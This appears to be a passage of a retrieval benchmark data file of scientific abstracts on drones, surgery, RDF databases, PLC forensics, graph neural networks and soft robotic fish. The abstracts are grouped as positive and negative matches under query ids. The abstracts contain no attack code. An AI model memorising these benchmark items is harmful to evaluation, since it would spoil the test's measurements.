"text": "High speed, low latency obstacle avoidance is essential for enabling Micro Aerial Vehicles (MAVs) to function in cluttered and dynamic environments. While other systems exist that do high-level mapping and 3D path planning for obstacle avoidance, most of these systems require high-powered CPUs on-board or off-board control from a ground station. We present a novel entirely on-board approach, leveraging a light-weight low power stereo vision system on FPGA. Our approach runs at a frame rate of 60 frames a second on VGA-sized images and minimizes latency between image acquisition and performing reactive maneuvers, allowing MAVs to fly more safely and robustly in complex environments. We also suggest our system as a light-weight safety layer for systems undertaking more complex tasks, like mapping the environment. Finally, we show our algorithm implemented on a lightweight, very computationally constrained platform, and demonstrate obstacle avoidance in a variety of environments.",
"title": ""
},
{
"docid": "a791efe9d0414842f7d82e056beaa96f",
"text": "OBJECTIVE\nTo report the outcomes of 500 robotically assisted laparoscopic radical prostatectomies (RALPs), a minimally invasive alternative for treating prostate cancer.\n\n\nPATIENTS AND METHODS\nIn all, 500 patients had RALP over a 30-month period. A transperitoneal six-port approach was used in each case, with the da Vinci robotic surgical system (Intuitive Surgical, Sunnyvale, CA, USA). Prospective data collection included quality-of-life questionnaires, basic demographics (height, weight and body mass index), prostate specific antigen (PSA) levels, clinical stage and Gleason grade. Variables assessed during RALP were operative duration, estimated blood loss (EBL) and complications, and after RALP were hospital stay, catheter time, pathology, PSA level, return of continence and potency.\n\n\nRESULTS\nThe mean (range) duration of RALP was 130 (51-330) min; all procedures were successful, with no intraoperative transfusions or deaths. The mean EBL was 10-300 mL; 97% of patients were discharged home on the first day after RALP with a mean haematocrit of 36%. The mean duration of catheterization was 6.9 (5-21) days. The positive margin rate was 9.4% for all patients; i.e. 2.5% for T2 tumours, 23% for T3a and 53% for T4. The overall biochemical recurrence free (PSA level<0.1 ng/mL) survival was 95% at mean follow-up of 9.7 months. There was complete continence at 3 and 6 months in 89% and 95% of patients, respectively. At 1 year 78% of patients were potent (with or without the use of oral medications), 15% were not yet able to sustain erections capable of intercourse, and another 7% still required injection therapy.\n\n\nCONCLUSION\nRALP is a safe, feasible and minimally invasive alternative for treating prostate cancer. Our initial experience with the procedure shows promising short-term outcomes.",
"title": ""
},
{
"docid": "e05fd90453c53b7cc41fa3b7c5303386",
"text": "The Resource Description Framework (RDF) represents a main ingredient and data representation format for Linked Data and the Semantic Web. It supports a generic graph-based data model and data representation format for describing things, including their relationships with other things. As the size of RDF datasets is growing fast, RDF data management systems must be able to cope with growing amounts of data. Even though physically handling RDF data using a relational table is possible, querying a giant triple table becomes very expensive because of the multiple nested joins required for answering graph queries. In addition, the heterogeneity of RDF Data poses entirely new challenges to database systems. This article provides a comprehensive study of the state of the art in handling and querying RDF data. In particular, we focus on data storage techniques, indexing strategies, and query execution mechanisms. Moreover, we provide a classification of existing systems and approaches. We also provide an overview of the various benchmarking efforts in this context and discuss some of the open problems in this domain.",
"title": ""
},
{
"docid": "e1d0c07f9886d3258f0c5de9dd372e17",
"text": "strategies and tools must be based on some theory of learning and cognition. Of course, crafting well-articulated views that clearly answer the major epistemological questions of human learning has exercised psychologists and educators for centuries. What is a mind? What does it mean to know something? How is our knowledge represented and manifested? Many educators prefer an eclectic approach, selecting “principles and techniques from the many theoretical perspectives in much the same way we might select international dishes from a smorgasbord, choosing those we like best and ending up with a meal which represents no nationality exclusively and a design technology based on no single theoretical base” (Bednar et al., 1995, p. 100). It is certainly the case that research within collaborative educational learning tools has drawn upon behavioral, cognitive information processing, humanistic, and sociocultural theory, among others, for inspiration and justification. Problems arise, however, when tools developed in the service of one epistemology, say cognitive information processing, are integrated within instructional systems designed to promote learning goals inconsistent with it. When concepts, strategies, and tools are abstracted from the theoretical viewpoint that spawned them, they are too often stripped of meaning and utility. In this chapter, we embed our discussion in learner-centered, constructivist, and sociocultural perspectives on collaborative technology, with a bias toward the third. The principles of these perspectives, in fact, provide the theoretical rationale for much of the research and ideas presented in this book. 2",
"title": ""
},
{
"docid": "d6838b41bfa127f34886322064c83f92",
"text": "The brainstem tegmentum, including the reticular formation, contains distinct nuclei, each of which has a set of chemical, physiological and anatomical features. Damage to the brainstem tegmentum is known to cause coma, the most radical disturbance of consciousness. However, it has remained unclear which nuclei within the tegmentum are crucial for the maintenance of consciousness in humans. Accordingly, we initiated a retrospective study of MRIs obtained from 47 patients with brainstem stroke. The lesion boundaries were charted on patient MRIs and transferred onto a corresponding series of 4.7 T MRIs obtained from a control brainstem specimen that later was cut on a freezing microtome and analysed histologically. In addition, medical charts and available post-mortem materials were used to obtain relevant clinical and anatomical data to verify the MRI readings in each case. We found that in the 38 patients who did not have coma, brainstem damage either was located outside the tegmentum (n = 29) or produced a very small and unilateral compromise of the tegmentum (n = 9). In contrast, in patients who had coma (n = 9), the lesions in the tegmentum were mostly bilateral (n = 7) and were located either in the pons alone (n = 4) or in the upper pons and the midbrain (n = 5). The maximum overlap territory of the lesions coincided with the location of the rostral raphe complex, locus coeruleus, laterodorsal tegmental nucleus, nucleus pontis oralis, parabrachial nucleus and the white matter in between these nuclei. We also found that four coma subjects developed hyperthermia and died in the absence of any infections. In these cases, the maximum lesion overlap was centred in the core of pontine tegmentum. Our findings suggest that lesions confined to the upper pons can cause coma in humans even in the absence of damage to the midbrain. The findings also point to the brainstem nuclei whose lesions are likely to be associated with loss of consciousness and fatal hyperthermia in humans.",
"title": ""
},
{
"docid": "f79b5057cf1bd621f8a3a69efcd5e100",
"text": "A novel, tri-band, planar plate-type antenna made of a compact metal plate for wireless local area network (WLAN) applications in the 2.4GHz (2400–2484MHz), 5.2GHz (5150– 5350MHz), and 5.8 GHz (5725–5825 MHz) bands is presented. The antenna was designed in a way that the operating principle includes dipole and loop resonant modes to cover the 2.4/5.2 and 5.8 GHz bands, respectively. The antenna comprises a larger radiating arm and a smaller loop radiating arm, which are connected to each other at the signal ground point. The antenna can easily be fed by using a 50 Ω mini-coaxial cable and shows good radiation performance. Details of the design are described and discussed in the article.",
"title": ""
},
{
"docid": "ba7d80246069938fbb0e8bc0170f50be",
"text": "Supervisory Control and Data Acquisition (SCADA) system is an industrial control automated system. It is built with multiple Programmable Logic Controllers (PLCs). PLC is a special form of microprocessor-based controller with proprietary operating system. Due to the unique architecture of PLC, traditional digital forensic tools are difficult to be applied. In this paper, we propose a program called Control Program Logic Change Detector (CPLCD), which works with a set of Detection Rules (DRs) to detect and record undesired incidents on interfering normal operations of PLC. In order to prove the feasibility of our solution, we set up two experiments for detecting two common PLC attacks. Moreover, we illustrate how CPLCD and network analyzer Wireshark could work together for performing digital forensic investigation on PLC.",
"title": ""
},
{
"docid": "718cf9a405a81b9a43279a1d02f5e516",
"text": "In cross-cultural psychology, one of the major sources of the development and display of human behavior is the contact between cultural populations. Such intercultural contact results in both cultural and psychological changes. At the cultural level, collective activities and social institutions become altered, and at the psychological level, there are changes in an individual's daily behavioral repertoire and sometimes in experienced stress. The two most common research findings at the individual level are that there are large variations in how people acculturate and in how well they adapt to this process. Variations in ways of acculturating have become known by the terms integration, assimilation, separation, and marginalization. Two variations in adaptation have been identified, involving psychological well-being and sociocultural competence. One important finding is that there are relationships between how individuals acculturate and how well they adapt: Often those who integrate (defined as being engaged in both their heritage culture and in the larger society) are better adapted than those who acculturate by orienting themselves to one or the other culture (by way of assimilation or separation) or to neither culture (marginalization). Implications of these findings for policy and program development and for future research are presented.",
"title": ""
},
{
"docid": "6d291a65658fff5db76df9d9d98855a6",
"text": "This paper gives an overview about different failure mechanisms which limit the safe operating area of power devices. It is demonstrated how the device internal processes can be investigated by means of device simulation. For instance, the electrothermal simulation of high-voltage diode turn-off reveals how a backside filament transforms into a continuous filament connecting the anode and cathode and how this can be accompanied with a transition from avalanche-induced into thermally driven carrier generation. A similar current destabilization may occur during insulated-gate bipolar transistor turn-off with a high turn-off rate, when the channel is closed quickly leading to strong dynamic avalanche. It is explained how the current filamentation depends on substrate resistivity, device thickness, channel width, and switching conditions (gate resistor and overcurrent). Filamentation processes during short-circuit events are discussed, and possible countermeasures are suggested. A mechanism of a periodically emerging and vanishing filament near the edge of the chip is presented. Examples on current destabilizing effects in gate turn-off thyristors, integrated gate-commutated thyristors, and metal-oxide-semiconductor field-effect transistors are given, and limitations of current device simulation are discussed.",
"title": ""
},
{
"docid": "5efb42ac41cbe3283d5791e8177bd86d",
"text": "Past work has documented and described major patterns of adaptive and maladaptive behavior: the mastery.oriented and the helpless patterns. In this article, we present a research-based model that accounts for these patterns in terms of underlying psychological processes. The model specifies how individuals' implicit theories orient them toward particular goals and how these goals set up the different patterns. Indeed, we show how each feature (cognitive, affective, and behavioral) of the adaptive and maladaptive patterns can be seen to follow directly from different goals. We then examine the generality of the model and use it to illuminate phenomena in a wide variety of domains. Finally, we place the model in its broadest context and examine its implications for our understanding of motivational and personality processes.",
"title": ""
},
{
"docid": "a2d38448513e69f514f88eb852e76292",
"text": "It is cost-efficient for a tenant with a limited budget to establish a virtual MapReduce cluster by renting multiple virtual private servers (VPSs) from a VPS provider. To provide an appropriate scheduling scheme for this type of computing environment, we propose in this paper a hybrid job-driven scheduling scheme (JoSS for short) from a tenant's perspective. JoSS provides not only job-level scheduling, but also map-task level scheduling and reduce-task level scheduling. JoSS classifies MapReduce jobs based on job scale and job type and designs an appropriate scheduling policy to schedule each class of jobs. The goal is to improve data locality for both map tasks and reduce tasks, avoid job starvation, and improve job execution performance. Two variations of JoSS are further introduced to separately achieve a better map-data locality and a faster task assignment. We conduct extensive experiments to evaluate and compare the two variations with current scheduling algorithms supported by Hadoop. The results show that the two variations outperform the other tested algorithms in terms of map-data locality, reduce-data locality, and network overhead without incurring significant overhead. In addition, the two variations are separately suitable for different MapReduce-workload scenarios and provide the best job performance among all tested algorithms.",
"title": ""
},
{
"docid": "80ccbda4de8a765111ad8994f2ac9e95",
"text": "Smart grid, smart metering, electromobility, and the regulation of the power network are keywords of the transition in energy politics. In the future, the power grid will be smart. Based on different works, this article presents a data collection, analyzing, and monitoring software for a reference smart grid. We discuss two possible architectures for collecting data from energy analyzers and analyze their performance with respect to real-time monitoring, load peak analysis, and automated regulation of the power grid. In the first architecture, we analyze the latency, needed bandwidth, and scalability for collecting data over the Modbus TCP/IP protocol and in the second one over a RESTful web service. The analysis results show that the solution with Modbus is more scalable as the one with RESTful web service. However, the performance and scalability of both architectures are sufficient for our reference smart grid and",
"title": ""
},
{
"docid": "1121e6d94c1e545e0fa8b0d8b0ef5997",
"text": "Research is a continuous phenomenon. It is recursive in nature. Every research is based on some earlier research outcome. A general approach in reviewing the literature for a problem is to categorize earlier work for the same problem as positive and negative citations. In this paper, we propose a novel automated technique, which classifies whether an earlier work is cited as sentiment positive or sentiment negative. Our approach first extracted the portion of the cited text from citing paper. Using a sentiment lexicon we classify the citation as positive or negative by picking a window of at most five (5) sentences around the cited place (corpus). We have used Naïve-Bayes Classifier for sentiment analysis. The algorithm is evaluated on a manually annotated and class labelled collection of 150 research papers from the domain of computer science. Our preliminary results show an accuracy of 80%. We assert that our approach can be generalized to classification of scientific research papers in different disciplines.",
"title": ""
},
{
"docid": "73f5e4d9011ce7115fd7ff0be5974a14",
"text": "In this work we present, apply, and evaluate a novel, interactive visualization model for comparative analysis of structural variants and rearrangements in human and cancer genomes, with emphasis on data integration and uncertainty visualization. To support both global trend analysis and local feature detection, this model enables explorations continuously scaled from the high-level, complete genome perspective, down to the low-level, structural rearrangement view, while preserving global context at all times. We have implemented these techniques in Gremlin, a genomic rearrangement explorer with multi-scale, linked interactions, which we apply to four human cancer genome data sets for evaluation. Using an insight-based evaluation methodology, we compare Gremlin to Circos, the state-of-the-art in genomic rearrangement visualization, through a small user study with computational biologists working in rearrangement analysis. Results from user study evaluations demonstrate that this visualization model enables more total insights, more insights per minute, and more complex insights than the current state-of-the-art for visual analysis and exploration of genome rearrangements.",
"title": ""
},
{
"docid": "ecf56a68fbd1df54b83251b9dfc6bf9f",
"text": "All our lives, we interact with the space around us, whether we are finding our way to a remote cabana in an exotic tropical isle or reaching for a ripe mango on the tree beside the cabana or finding a comfortable position in the hammock to snack after the journey. Each of these natural situations is experienced differently, and as a consequence, each is conceptualized differently. Our knowledge of space, unlike geometry or physical measurements of space, is constructed out of the things in space, not space itself. Mental spaces are schematized, eliminating detail and simplifying features around a framework consisting of elements and the relations among them. Our research suggests that which elements and spatial relations are included and how they are schematized varies with the space in ways that reflect our experience in the space. The space of navigation is too large to be seen from a single place (short of flying over it, but that is a different experience). To find our way in a large environment requires putting together information from different views or different sources. For the most part, the space of navigation is conceptualized as a two-dimensional plane, like a map. Maps, too, are schematized, yet they differ in significant ways from mental representations of space. The space around the body stands in contrast to the space of navigation. It can be seen from a single place, given rotation in place. It is the space of immediate action, our own or the things around us. It is also conceptualized schematically, but in three dimensions. Finally, there is the space of our own bodies. This space is the space of our own actions and our own sensations, experienced from the inside as well as the outside. It is schematized in terms of our limbs. Knowledge of these three spaces, that is, knowledge of the relative locations of the places in navigation space that are critical to our lives, knowledge of the space we are currently interacting with, and knowledge of the space of our bodies, is essential to finding our way in the world, to fulfilling our needs, and to avoiding danger, in short, necessary to survival.",
"title": ""
},
{
"docid": "8b0278400c9576c4a3a77a4ec742809c",
"text": "Storyline detection aims to connect seemly irrelevant single documents into meaningful chains, which provides opportunities for understanding how events evolve over time and what triggers such evolutions. Most previous work generated the storylines through unsupervised methods that can hardly reveal underlying factors driving the evolution process. This paper introduces a Bayesian model to generate storylines from massive documents and infer the corresponding hidden relations and topics. In addition, our model is the first attempt that utilizes Twitter data as human input to ``supervise'' the generation of storylines. Through extensive experiments, we demonstrate our proposed model can achieve significant improvement over baseline methods and can be used to discover interesting patterns for real world cases.",
"title": ""
}
] | scidocsrr |
3eb8279416c873d54f080d56bf105bd7 | Active Social Media Management: The Case of Health Care | [
{
"docid": "3eee111e4521528031019f83786efab7",
"text": "Social media platforms such as Twitter and Facebook enable the creation of virtual customer environments (VCEs) where online communities of interest form around specific firms, brands, or products. While these platforms can be used as another means to deliver familiar e-commerce applications, when firms fail to fully engage their customers, they also fail to fully exploit the capabilities of social media platforms. To gain business value, organizations need to incorporate community building as part of the implementation of social media.",
"title": ""
},
{
"docid": "6a27457b4d8efea03475f4d276a704c9",
"text": "Why are certain pieces of online content more viral than others? This article takes a psychological approach to understanding diffusion. Using a unique dataset of all the New York Times articles published over a three month period, the authors examine how emotion shapes virality. Results indicate that positive content is more viral than negative content, but that the relationship between emotion and social transmission is more complex than valence alone. Virality is driven, in part, by physiological arousal. Content that evokes high-arousal positive (awe) or negative (anger or anxiety) emotions is more viral. Content that evokes low arousal, or deactivating emotions (e.g., sadness) is less viral. These results hold even controlling for how surprising, interesting, or practically useful content is (all of which are positively linked to virality), as well as external drivers of attention (e.g., how prominently content was featured). Experimental results further demonstrate the causal impact of specific emotion on transmission, and illustrate that it is driven by the level of activation induced. Taken together, these findings shed light on why people share content and provide insight into designing effective viral marketing",
"title": ""
},
{
"docid": "572348e4389acd63ea7c0667e87bbe04",
"text": "Through the analysis of collective upvotes and downvotes in multiple social media, we discover the bimodal regime of collective evaluations. When online content surpasses the local social context by reaching a threshold of collective attention, negativity grows faster with positivity, which serves as a trace of the burst of a filter bubble. To attain a global audience, we show that emotions expressed in online content has a significant effect and also play a key role in creating polarized opinions.",
"title": ""
}
] | [
{
"docid": "0b6ac11cb84a573e55cb75f0bc342d72",
"text": "This paper develops and tests algorithms for predicting the end-to-end route of a vehicle based on GPS observations of the vehicle’s past trips. We show that a large portion of a typical driver’s trips are repeated. Our algorithms exploit this fact for prediction by matching the first part of a driver’s current trip with one of the set of previously observed trips. Rather than predicting upcoming road segments, our focus is on making long term predictions of the route. We evaluate our algorithms using a large corpus of real world GPS driving data acquired from observing over 250 drivers for an average of 15.1 days per subject. Our results show how often and how accurately we can predict a driver’s route as a function of the distance already driven.",
"title": ""
},
{
"docid": "afe24ba1c3f3423719a98e1a69a3dc70",
"text": "This brief presents a nonisolated multilevel linear amplifier with nonlinear component (LINC) power amplifier (PA) implemented in a standard 0.18-μm complementary metal-oxide- semiconductor process. Using a nonisolated power combiner, the overall power efficiency is increased by reducing the wasted power at the combined out-phased signal; however, the efficiency at low power still needs to be improved. To further improve the efficiency of the low-power (LP) mode, we propose a multiple-output power-level LINC PA, with load modulation implemented by switches. In addition, analysis of the proposed design on the system level as well as the circuit level was performed to optimize its performance. The measurement results demonstrate that the proposed technique maintains more than 45% power-added efficiency (PAE) for peak power at 21 dB for the high-power mode and 17 dBm for the LP mode at 600 MHz. The PAE for a 6-dB peak-to-average ratio orthogonal frequency-division multiplexing modulated signal is higher than 24% PAE in both power modes. To the authors' knowledge, the proposed output-phasing PA is the first implemented multilevel LINC PA that uses quarter-wave lines without multiple power supply sources.",
"title": ""
},
{
"docid": "af598c452d9a6589e45abe702c7cab58",
"text": "This paper proposes the concept of “liveaction virtual reality games” as a new genre of digital games based on an innovative combination of live-action, mixed-reality, context-awareness, and interaction paradigms that comprise tangible objects, context-aware input devices, and embedded/embodied interactions. Live-action virtual reality games are “live-action games” because a player physically acts out (using his/her real body and senses) his/her “avatar” (his/her virtual representation) in the game stage – the mixed-reality environment where the game happens. The game stage is a kind of “augmented virtuality” – a mixedreality where the virtual world is augmented with real-world information. In live-action virtual reality games, players wear HMD devices and see a virtual world that is constructed using the physical world architecture as the basic geometry and context information. Physical objects that reside in the physical world are also mapped to virtual elements. Liveaction virtual reality games keeps the virtual and real-worlds superimposed, requiring players to physically move in the environment and to use different interaction paradigms (such as tangible and embodied interaction) to complete game activities. This setup enables the players to touch physical architectural elements (such as walls) and other objects, “feeling” the game stage. Players have free movement and may interact with physical objects placed in the game stage, implicitly and explicitly. Live-action virtual reality games differ from similar game concepts because they sense and use contextual information to create unpredictable game experiences, giving rise to emergent gameplay.",
"title": ""
},
{
"docid": "6e8d1e237cf7a247e9f51266af306f09",
"text": "Regional morphometic analyses of the corpus callosum (CC) are typically done using the 2D medial section of the structure, but the shape information is lost through this method. Here we perform 3D regional group comparisons of the surface anatomy of the CC between 12 preterm and 11 term-born neonates. We reconstruct CC surfaces from manually segmented brain MRI and build parametric meshes on the surfaces by computing surface conformal parameterizations with holomorphic 1-forms. Surfaces are registered by constrained harmonic maps on the parametric domains and statistical comparisons between the two groups are performed via multivariate tensor-based morphometry (mTBM). We detect statistically significant morphological changes in the genu and the splenium. Our mTBM analysis is compared to the medial axis distance [13], and to a usual 2D analysis.",
"title": ""
},
{
"docid": "28b824d73a1efb48ee5628ac461d925e",
"text": "Automatic assessment of sentiment from visual content has gained considerable attention with the increasing tendency of expressing opinions on-line. In this paper, we solve the problem of visual sentiment analysis using the high-level abstraction in the recognition process. Existing methods based on convolutional neural networks learn sentiment representations from the holistic image appearance. However, different image regions can have a different influence on the intended expression. This paper presents a weakly supervised coupled convolutional network with two branches to leverage the localized information. The first branch detects a sentiment specific soft map by training a fully convolutional network with the cross spatial pooling strategy, which only requires image-level labels, thereby significantly reducing the annotation burden. The second branch utilizes both the holistic and localized information by coupling the sentiment map with deep features for robust classification. We integrate the sentiment detection and classification branches into a unified deep framework and optimize the network in an end-to-end manner. Extensive experiments on six benchmark datasets demonstrate that the proposed method performs favorably against the state-of-the-art methods for visual sentiment analysis.",
"title": ""
},
{
"docid": "0cbadd52e253c04d95558115a8eec9e4",
"text": "A self-recovering receiver for encoded and scrambled binary data streams is proposed in this paper. The generating polynomial of the scrambling sequence is known, as well as the encoder structure and coefficients, but the scrambler time offset is unknown. Taking profit of redundancy introduced by the encoder, we proposed a method which is able to estimate the scrambling sequence offset from the observed scrambled stream. The method is based on the projection of the observed data on the encoder orthogonal subspace. Once the offset has been estimated, classical data descrambling and decoding can be used to recover the information stream.",
"title": ""
},
{
"docid": "1cbd13de915d2a4cedd736345ebb2134",
"text": "This paper deals with the design and implementation of a nonlinear control algorithm for the attitude tracking of a four-rotor helicopter known as quadrotor. This algorithm is based on the second order sliding mode technique known as Super-Twisting Algorithm (STA) which is able to ensure robustness with respect to bounded external disturbances. In order to show the effectiveness of the proposed controller, experimental tests were carried out on a real quadrotor. The obtained results show the good performance of the proposed controller in terms of stabilization, tracking and robustness with respect to external disturbances.",
"title": ""
},
{
"docid": "421320aa01ba00a91a843f2c6f710224",
"text": "Visual simulation of natural phenomena has become one of the most important research topics in computer graphics. Such phenomena include water, fire, smoke, clouds, and so on. Recent methods for the simulation of these phenomena utilize techniques developed in computational fluid dynamics. In this paper, the basic equations (Navier-Stokes equations) for simulating these phenomena are briefly described. These basic equations are used to simulate various natural phenomena. This paper then explains our applications of the equations for simulations of smoke, clouds, and aerodynamic sound.",
"title": ""
},
{
"docid": "d4615de80544972d2313c6d80a9e19fd",
"text": "Herein is presented an external capacitorless low-dropout regulator (LDO) that provides high-power-supply rejection (PSR) at all low-to-high frequencies. The LDO is designed to have the dominant pole at the gate of the pass transistor to secure stability without the use of an external capacitor, even when the load current increases significantly. Using the proposed adaptive supply-ripple cancellation (ASRC) technique, in which the ripples copied from the supply are injected adaptively to the body gate, the PSR hump that appears in conventional gate-pole-dominant LDOs can be suppressed significantly. Since the ASRC circuit continues to adjust the magnitude of the injecting ripples to an optimal value, the LDO presented here can maintain high PSRs, irrespective of the magnitude of the load current <inline-formula> <tex-math notation=\"LaTeX\">$I_{L}$ </tex-math></inline-formula>, or the dropout voltage <inline-formula> <tex-math notation=\"LaTeX\">$V_{\\mathrm {DO}}$ </tex-math></inline-formula>. The proposed LDO was fabricated in a 65-nm CMOS process, and it had an input voltage of 1.2 V. With a 240-pF load capacitor, the measured PSRs were less than −36 dB at all frequencies from 10 kHz to 1 GHz, despite changes of <inline-formula> <tex-math notation=\"LaTeX\">$I_{L}$ </tex-math></inline-formula> and <inline-formula> <tex-math notation=\"LaTeX\">$V_{\\mathrm {DO}}$ </tex-math></inline-formula> as well as process, voltage, temperature (PVT) variations.",
"title": ""
},
{
"docid": "b84018deef3a7ff429bf3d84fb5118c9",
"text": "We show that macroeconomic movements have strong effects on the happiness of nations. First, we find that there are clear microeconomic patterns in the psychological well-being levels of a quarter of a million randomly sampled Europeans and Americans from the 1970s to the 1990s. Happiness equations are monotonically increasing in income, and have similar structure in different countries. Second, movements in reported well-being are correlated with changes in macroeconomic variables such as gross domestic product. This holds true after controlling for the personal characteristics of respondents, country fixed effects, year dummies, and country-specific time trends. Third, the paper establishes that recessions create psychic losses that extend beyond the fall in GDP and rise in the number of people unemployed. These losses are large. Fourth, the welfare state appears to be a compensating force: higher unemployment benefits are associated with higher national well-being.",
"title": ""
},
{
"docid": "bdbbe079493bbfec7fb3cb577c926997",
"text": "A large amount of information on the Web is contained in regularly structured objects, which we call data records. Such data records are important because they often present the essential information of their host pages, e.g., lists of products or services. It is useful to mine such data records in order to extract information from them to provide value-added services. Existing automatic techniques are not satisfactory because of their poor accuracies. In this paper, we propose a more effective technique to perform the task. The technique is based on two observations about data records on the Web and a string matching algorithm. The proposed technique is able to mine both contiguous and non-contiguous data records. Our experimental results show that the proposed technique outperforms existing techniques substantially.",
"title": ""
},
{
"docid": "954d0ef5a1a648221ce8eb3f217f4071",
"text": "Deep learning has revolutionized many machine learning tasks in recent years, ranging from image classification and video processing to speech recognition and natural language understanding. The data in these tasks are typically represented in the Euclidean space. However, there is an increasing number of applications where data are generated from non-Euclidean domains and are represented as graphs with complex relationships and interdependency between objects. The complexity of graph data has imposed significant challenges on existing machine learning algorithms. Recently, many studies on extending deep learning approaches for graph data have emerged. In this survey, we provide a comprehensive overview of graph neural networks (GNNs) in data mining and machine learning fields. We propose a new taxonomy to divide the state-of-the-art graph neural networks into different categories. With a focus on graph convolutional networks, we review alternative architectures that have recently been developed; these learning paradigms include graph attention networks, graph autoencoders, graph generative networks, and graph spatial-temporal networks. We further discuss the applications of graph neural networks across various domains and summarize the open source codes and benchmarks of the existing algorithms on different learning tasks. Finally, we propose potential research directions in this",
"title": ""
},
{
"docid": "ed097b44837a57ad0053ae06a95f1543",
"text": "For underwater videos, the performance of object tracking is greatly affected by illumination changes, background disturbances and occlusion. Hence, there is a need to have a robust function that computes image similarity, to accurately track the moving object. In this work, a hybrid model that incorporates the Kalman Filter, a Siamese neural network and a miniature neural network has been developed for object tracking. It was observed that the usage of the Siamese network to compute image similarity significantly improved the robustness of the tracker. Although the model was developed for underwater videos, it was found that it performs well for both underwater and human surveillance videos. A metric has been defined for analyzing detections-to-tracks mapping accuracy. Tracking results have been analyzed using Multiple Object Tracking Accuracy (MOTA) and Multiple Object Tracking Precision (MOTP)metrics.",
"title": ""
},
{
"docid": "0c7b1972a409657dc49b470e7ee4b4c3",
"text": "In this letter, a new subpixel rendering algorithm using the hue-saturation-intensity (HSI)-based color error analysis is proposed for matrix display devices. The proposed method converts an RGB input image into a HSI image, which is a color space based on human color perception, in order to analyze the sampling errors that are caused by subpixel rendering. Then, it computes the difference between the directionally displaced pixels and selects the direction with the minimum difference. Finally, the proposed method adaptively assigns weights to current and neighboring subpixels based on the directional difference. In experiments for various types of test images, the proposed method enhanced the average luminance sharpness by up to 0.224 and the average chrominance blending by up to 7.311 dB, as compared to the benchmark methods.",
"title": ""
},
{
"docid": "342b72bf32937104ae80ae275c8c9585",
"text": "In this paper, we introduce a Radio Frequency IDentification (RFID) based smart shopping system, KONARK, which helps users to checkout items faster and to track purchases in real-time. In parallel, our solution also provides the shopping mall owner with information about user interest on particular items. The central component of KONARK system is a customized shopping cart having a RFID reader which reads RFID tagged items. To provide check-out facility, our system detects in-cart items with almost 100% accuracy within 60s delay by exploiting the fact that the physical level information (RSSI, phase, doppler, read rate etc.) of in-cart RFID tags are different than outside tags. KONARK also detects user interest with 100% accuracy by exploiting the change in physical level parameters of RFID tag on the object user interacted with. In general, KONARK has been shown to perform with reasonably high accuracy in different mobility speeds in a mock-up of a shopping mall isle.",
"title": ""
},
{
"docid": "2f423bc89dba66eb47f0290ea45079c6",
"text": "he implementation of deinstitutionalization in the 1960s and 1970s, and the increasing ascendance of the community support system concept and the practice of psychiatric rehabilitation in the 1980s, have laid the foundation for a new 1990s vision of service delivery for people who have mental illness. Recovery from mental illness is the vision that will guide the mental health system in this decade. This article outlines the fundamental services and assumptions of a recovery-oriented mental health system. As the recovery concept becomes better understood, it could have major implications for how future mental health systems are designed. The seeds of the recovery vision were sown in the aftermath of the era of deinstitutionalization. The failures in the implementation of the policy of deinstitutionalization confronted us with the fact that a person with severe mental illness wants and needs more than just symptom relief. People with severe T CHANGING TOWARD THE FUTURE",
"title": ""
},
{
"docid": "16dae5a68647c9a8aa93b900eb470eb4",
"text": "Saving power in datacenter networks has become a pressing issue. ElasticTree and CARPO fat-tree networks have recently been proposed to reduce power consumption by using sleep mode during the operation stage of the network. In this paper, we address the design stage where the right switch size is evaluated to maximize power saving during the expected operation of the network. Our findings reveal that deploying a large number of small switches is more power-efficient than a small number of large switches when the traffic demand is relatively moderate or when servers exchanging traffic are in close proximity. We also discuss the impact of sleep mode on performance such as packet delay and loss.",
"title": ""
},
{
"docid": "e593e0c88ffb6ca47416147f470c6187",
"text": "Recent research indicates that toddlers can monitor others' conversations, raising the possibility that they can acquire vocabulary in this way. Three studies examined 2-year-olds' (N = 88) ability to learn novel words when overhearing these words used by others. Children aged 2,6 were equally good at learning novel words-both object labels and action verbs-when they were overhearers as when they were directly addressed. For younger 2-year-olds (2,1), this was true for object labels, but the results were less clear for verbs. The findings demonstrate that 2-year-olds can acquire novel words from overheard speech, and highlight the active role played by toddlers in vocabulary acquisition.",
"title": ""
},
{
"docid": "3be0c125aefca31ccaefab9c1d4941ce",
"text": "The midbrain dopamine neurons are hypothesized to provide a physiological correlate of the reward prediction error signal required by current models of reinforcement learning. We examined the activity of single dopamine neurons during a task in which subjects learned by trial and error when to make an eye movement for a juice reward. We found that these neurons encoded the difference between the current reward and a weighted average of previous rewards, a reward prediction error, but only for outcomes that were better than expected. Thus, the firing rate of midbrain dopamine neurons is quantitatively predicted by theoretical descriptions of the reward prediction error signal used in reinforcement learning models for circumstances in which this signal has a positive value. We also found that the dopamine system continued to compute the reward prediction error even when the behavioral policy of the animal was only weakly influenced by this computation.",
"title": ""
}
] | scidocsrr |
2a92b61dabc35abb8b9e5c43b9fd7fae | A Modular Dielectric Elastomer Actuator to Drive Miniature Autonomous Underwater Vehicles | [
{
"docid": "e259e255f9acf3fa1e1429082e1bf1de",
"text": "In this work we describe an autonomous soft-bodied robot that is both self-contained and capable of rapid, continuum-body motion. We detail the design, modeling, fabrication, and control of the soft fish, focusing on enabling the robot to perform rapid escape responses. The robot employs a compliant body with embedded actuators emulating the slender anatomical form of a fish. In addition, the robot has a novel fluidic actuation system that drives body motion and has all the subsystems of a traditional robot onboard: power, actuation, processing, and control. At the core of the fish's soft body is an array of fluidic elastomer actuators. We design the fish to emulate escape responses in addition to forward swimming because such maneuvers require rapid body accelerations and continuum-body motion. These maneuvers showcase the performance capabilities of this self-contained robot. The kinematics and controllability of the robot during simulated escape response maneuvers are analyzed and compared with studies on biological fish. We show that during escape responses, the soft-bodied robot has similar input-output relationships to those observed in biological fish. The major implication of this work is that we show soft robots can be both self-contained and capable of rapid body motion.",
"title": ""
}
] | [
{
"docid": "835dbc5d1c45d991fece5bb29f961bec",
